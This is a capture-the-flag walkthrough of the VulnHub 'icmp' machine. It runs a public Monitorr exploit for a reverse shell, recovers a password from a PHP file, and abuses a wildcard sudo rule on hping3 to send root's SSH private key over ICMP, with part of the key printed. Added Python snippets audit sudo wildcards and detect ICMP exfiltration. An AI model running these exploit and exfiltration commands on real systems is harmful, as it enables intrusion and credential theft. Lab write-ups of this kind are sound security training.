https://www.vulnhub.com/entry/icmp-1,633/
A full port scan finds only 22 (SSH) and 80 (HTTP) open.
┌──(kali㉿mykali)-[~/Documents/icmp]
└─$ nmap -sV -sC -p- 192.168.56.81 -oN ports.log
...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
Brute-force directories on port 80.
┌──(kali㉿mykali)-[~/Documents/icmp]
└─$ gobuster dir -u http://192.168.56.81 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt -b 400,403,404,500 --wildcard
/index.php (Status: 302)
/mon       (Status: 301)
Opening port 80 in Firefox shows a system monitoring application named "Monitorr". searchsploit lists known exploits for it.
┌──(kali㉿mykali)-[~/Documents/icmp]
└─$ searchsploit monitorr
----------------------------------------------------- ---------------------------------
 Exploit Title                                       |  Path
----------------------------------------------------- ---------------------------------
Monitorr 1.7.6m - Authorization Bypass               | php/webapps/48981.py
Monitorr 1.7.6m - Remote Code Execution (Unauthentic | php/webapps/48980.py
----------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
Use 48980.py to get a reverse shell (the exploit in one terminal, the netcat listener in a second).
┌──(kali㉿mykali)-[~/Documents/icmp]
└─$ python3 48980.py http://192.168.56.81/mon 192.168.56.150 1234
------------------------------------------------------------------------------
┌──(kali㉿mykali)-[~/Documents/icmp]
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.56.150] from (UNKNOWN) [192.168.56.81] 44222
bash: cannot set terminal process group (498): Inappropriate ioctl for device
bash: no job control in this shell
www-data@icmp:/var/www/html/mon/assets/data/usrimg$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@icmp:/var/www/html/mon/assets/data/usrimg$
In fox's home directory there is a reminder text file and a "devel" folder whose contents we cannot list (it is execute-only for other users).
www-data@icmp:/home/fox$ cd /home/fox
cd /home/fox
www-data@icmp:/home/fox$ ls -la
ls -la
total 20
drwxr-xr-x 3 root root 4096 Dec  3 16:08 .
drwxr-xr-x 3 root root 4096 Dec  3 16:04 ..
lrwxrwxrwx 1 root root    9 Dec  3 16:08 .bash_history -> /dev/null
drwx--x--x 2 fox  fox  4096 Dec  3 16:05 devel
-rw-r--r-- 1 fox  fox    33 Dec  3 16:08 local.txt
-rw-r--r-- 1 root root   78 Dec  3 16:08 reminder
www-data@icmp:/home/fox$ cat reminder
cat reminder
crypt with crypt.php: done, it works
work on decrypt with crypt.php: howto?!?
www-data@icmp:/home/fox$
From the note, we guess there may be a file named crypt.php in devel. Because the directory is execute-only, we cannot list it, but we can still open a file inside it if we know its exact name.
www-data@icmp:/home/fox$ ls -la devel/crypt.php
ls -la devel/crypt.php
-rw-r--r-- 1 fox fox 56 Dec  3 16:05 devel/crypt.php
www-data@icmp:/home/fox$ cat devel/crypt.php
cat devel/crypt.php
<?php
echo crypt('.............','da');
?>
The first argument to crypt() is the plaintext password, so we can try to log in over SSH as fox with it, then check what sudo allows.
┌──(kali㉿mykali)-[~/Documents/icmp]
└─$ ssh fox@192.168.56.81                                                1 ⚙
fox@192.168.56.81's password:
Linux icmp 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
...
Last login: Fri Mar 12 05:43:09 2021 from 192.168.56.150
$ sudo -l
[sudo] password for fox:
Matching Defaults entries for fox on icmp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fox may run the following commands on icmp:
    (root) /usr/sbin/hping3 --icmp *
    (root) /usr/bin/killall hping3
$
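The weak point is the sudoers rule itself: sudoers matches command arguments as one space-separated string, and a `*` in the argument list matches any further arguments (spaces included), so `--icmp *` accepts whatever extra hping3 options the user adds. The following is an added example, not part of the walkthrough, that parses `sudo -l` output and flags rules with wildcard arguments for review; the sample text is constructed from the fox entries above plus one hypothetical NOPASSWD line to exercise tag parsing.

```python
import re

# Constructed `sudo -l` output, modelled on the fox user's entries in the walkthrough
# plus one extra (hypothetical) rule to show a tag being parsed.
SAMPLE_SUDO_L = """\
Matching Defaults entries for fox on icmp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User fox may run the following commands on icmp:
    (root) /usr/sbin/hping3 --icmp *
    (root) /usr/bin/killall hping3
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
"""

# One rule line: (runas) [TAG: ...] /path/to/cmd [args]
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S+)\s*(?P<args>.*)$")

def parse_sudo_l(text):
    """Return (runas, command, args, tags) for each rule listed after the 'may run' line."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            rules.append((m["runas"], m["cmd"], m["args"].strip(), m["tags"].strip()))
    return rules

def audit_rules(rules):
    """Flag rules whose argument list contains a sudoers wildcard.

    '*' in sudoers arguments matches any characters including spaces, so '--icmp *'
    accepts any options the user appends (in the walkthrough, hping3's --file and
    --sign). The fix is an exact argument list, or a root-owned wrapper script that
    hard-codes the options and is the only thing the rule allows.
    """
    findings = []
    for runas, cmd, args, tags in rules:
        if any(ch in args for ch in "*?[]"):
            findings.append("%s %s (runs as %s): wildcard in arguments" % (cmd, args, runas))
    return findings

if __name__ == "__main__":
    for finding in audit_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print("REVIEW:", finding)
```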
Because the rule allows any arguments after --icmp, hping3 can be told to read a root-owned file as packet payload and send it over ICMP to a listener. We need two terminals on the victim machine: one sends and one receives.
Here is the first (sending) terminal. Press Ctrl+C once the second terminal has received the whole private key.
fox@icmp:~$ sudo hping3 --icmp 127.0.0.1 -d 100 --sign signature --file /root/.ssh/id_rsa
HPING 127.0.0.1 (lo 127.0.0.1): icmp mode set, 28 headers + 100 data bytes
[main] memlockall(): Success
Warning: can't disable memory paging!
len=128 ip=127.0.0.1 ttl=64 id=5102 icmp_seq=0 rtt=6.6 ms
...
len=128 ip=127.0.0.1 ttl=64 id=8754 icmp_seq=30 rtt=2.6 ms
^C
--- 127.0.0.1 hping statistic ---
31 packets transmitted, 31 packets received, 0% packet loss
round-trip min/avg/max = 0.6/4.8/8.1 ms
Here is the second (receiving) terminal.
fox@icmp:~$ sudo hping3 --icmp 127.0.0.1 --listen signature --safe
Warning: Unable to guess the output interface
hping3 listen mode
[main] memlockall(): Success
Warning: can't disable memory paging!
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAqcCz/pKzjVNZi9zdKJDkvhMhY8lOb2Qth8e/3bLJ/ssgmRLoJXAQ
...
qEx5FmhFueiELGZjVJiEPAWbbsFRdskr4eYfhJ+bz91G5aJXpIJqsNw829TOXf/3439Rix
q/qSihL6WLsu0AAAAQcm9vdEBjYWxpcGVuZHVsYQECAw==
-----END OPENSSH PRIVATE KEY-----
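From the monitoring side, the giveaway is the echo payload: a stock Linux ping carries a timestamp plus a fixed byte pattern, whereas the run above carried 100-byte chunks of a text file. The following is an added example, not part of the walkthrough, that parses raw ICMP echo packets, verifies the RFC 1071 checksum, and flags payloads that look like file contents; the two sample packets are constructed inline (the exact framing hping3 uses for --sign/--file is not reproduced).

```python
import string
import struct

PRINTABLE = set(string.printable.encode())

def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum; a packet with a valid checksum sums to 0."""
    data += b"\x00" * (len(data) % 2)
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_echo(ident: int, seq: int, payload: bytes) -> bytes:
    """ICMP echo request (type 8, code 0); used here only to construct sample packets."""
    hdr = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    return struct.pack("!BBHHH", 8, 0, icmp_checksum(hdr + payload), ident, seq) + payload

def parse_echo(pkt: bytes):
    """Return (ident, seq, payload) for an echo request/reply; None if malformed or bad checksum."""
    if len(pkt) < 8:
        return None
    typ, code, _csum, ident, seq = struct.unpack("!BBHHH", pkt[:8])
    if typ not in (0, 8) or code != 0 or icmp_checksum(pkt) != 0:
        return None
    return ident, seq, pkt[8:]

def flag_payload(payload: bytes, max_normal: int = 64) -> list:
    """Heuristics for echo payloads that look like file contents rather than a ping pattern."""
    reasons = []
    if len(payload) > max_normal:
        reasons.append("payload of %d bytes exceeds %d" % (len(payload), max_normal))
    if payload and sum(b in PRINTABLE for b in payload) / len(payload) > 0.95:
        reasons.append("payload is almost entirely printable text")
    if b"PRIVATE KEY" in payload or b"-----BEGIN" in payload:
        reasons.append("PEM/OpenSSH key marker in payload")
    return reasons

def scan(packets):
    """[(seq, reasons)] for each valid echo packet whose payload trips a heuristic."""
    hits = []
    for parsed in filter(None, map(parse_echo, packets)):
        reasons = flag_payload(parsed[2])
        if reasons:
            hits.append((parsed[1], reasons))
    return hits

# Constructed samples: a stock ping payload (16-byte timestamp + bytes 0x10..0x37),
# then a 100-byte text chunk mirroring the -d 100 run above.
NORMAL_PAYLOAD = b"\x00" * 16 + bytes(range(0x10, 0x38))
EXFIL_PAYLOAD = b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + b"A" * 64
SAMPLE = [build_echo(0x1234, 0, NORMAL_PAYLOAD), build_echo(0x1234, 1, EXFIL_PAYLOAD)]
```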
Now we can SSH in as root with the recovered key.
┌──(kali㉿mykali)-[~/Documents/icmp]
└─$ ssh root@192.168.56.81 -i id_rsa                                    130 ⨯ 1 ⚙
Linux icmp 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Mar 12 05:55:54 2021 from 192.168.56.150
root@icmp:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
icmp